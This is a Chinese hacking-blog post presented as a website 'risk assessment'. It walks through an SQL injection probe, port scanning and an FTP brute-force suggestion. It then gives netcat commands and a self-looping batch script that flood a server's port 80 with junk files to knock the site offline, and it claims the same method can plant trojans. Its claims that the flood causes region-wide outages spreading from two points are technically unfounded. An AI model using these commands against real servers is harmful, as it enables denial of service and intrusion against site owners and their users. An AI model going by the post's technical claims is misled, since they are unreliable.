危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2289 浏览18788059

风险评估之妙用NC实现压力测试

前些日子,我为朋友的网站做了一下先风险评估,从中我学会了一种方法,妙用NC来做压力测试,我就把这种方法介绍给大家吧,现在我是以一个黑客的角度来检测的。

首先我们要明白,风险评估就是要从黑客的角度来看一个站点,那么我们要做风险评估的网站是http://www.****.com(为了不引起误会,我用自己的网址代替),这是一个php类型的网站,这样的网站我们通常是看有无注入漏洞。

我们在地址栏的这个地方http://www.****.com提交一个and 1=1。

网站做了过滤,防注入了。

怎么办?通常从黑客角度来说入侵一个网站不一定要从它的网站程序人手,也就是说不一定从脚本人手。因为我们不可能把asp,php,jsp,cgi,asp.net这些类型的脚本语言都学会,那么我们如何入侵呢?答案是从服务器人手。

我们先做下旁注检测。

独立服务器,那么它开了那些端口呢?

直接看看3389

连接不到它。

要么没开3389,要么改端口了。我们先扫描下。

就扫到21,跟80了。我们继续扫。

OK,下面可以分2路来“入侵”

1、FTP“爆破”

“爆破”就是基于用户名密码的入侵,这样最简单,但是也是最浪费时间的一种入侵方式。不停的猜解就OK了。这样的FTP爆破器很多,童鞋们可以自己下载一个然后开始爆破。

2、下面我们开始讲解一个新方法,用NC来实现压力测试,我们要做的其实很简单入侵用到的“垃圾”文件和一个NC。

下面看我操作:

我们在开始一>允许—>cmd调用出命令提示符。

只要写下面四句话就把要提交的垃圾数据提交上去了:


nc-nvv 180.178.**.**80<c:\1.bat


nc-nvv 180.178.**.**80<c:\2.stat


nc-nvv 180.178.**.**80<c:\3.vbe


nc-nvv 180.178.**.**80<c:\4ocx


OK,就这样就行了。

我们重复输入这4句话,不到10秒就打开这个网站就有点卡了。

下面我讲原理:


nc-nvv 180.178.**.**80<c:\1.bat


nc-nvv 180.178.**.**80<c:\2.stat


nc-nvv 180.178.**.**80<c:\3.vbe


nc-nvv 180.178.**.**80<c:\4ocx


讲解:连接到 180.178.**.**的80端口,并在其管道中发送c:\l.bat,c:\2.stat,c:\3.vbe,c:\4.ocx的内容。

当我们不停的向服务器的管道扔垃圾数据时,就会造成服务器瘫痪。

根据我们扔得“垃圾”的不同,如木马程序,溢出代码等等,对服务器造成的影响也不同。

而今天我扔得是一个批处理一个vbe脚本,还有一个stat文件和一个ActiveX控件。

一台黑客计算机采取这样的方式“入侵”服务器大约1分钟左右,其他人在浏览网站时一般会变成这个样子。

当4台以上计算机对服务器采取这样的方式“入侵”大约10分钟左右,便可造成黑客所在地区与服务器所在地区出现拒绝服务。

同时也可以实现网站挂马等,这要根据你提交的“垃圾”信息而定。

我们是通过正常的方式向它的80端口提交垃圾信息,因为服务器是香港的,所以先是黑客所在地区受到影响,然后是香港地区收到影响,以后这两个点为圆心扩散。

当然,我们不会手动的去一直写下去,我们要用一个批处理来自动执行。


@echo on


c:


cd nc


nc-nvv 180.178.**.**80<c:\1.bat


nc-nvv 180.178.**.**80<c:\2.stat


nc-nvv 180.178.**.**80<c:\3.vbe


nc-nvv 180.178.**.**80<c:\4ocx


call c:\nc\1.bat


之后你就可以挂着机器,然后出去打球,等你回来后你会发现,那个站已经被你蹂躏的面目全非了,写完后我就写了一份报告给了他,嘿嘿,虽然是免费给他搞了一次风险评估,但是从中获得了一些知识,受益不小。

相关推荐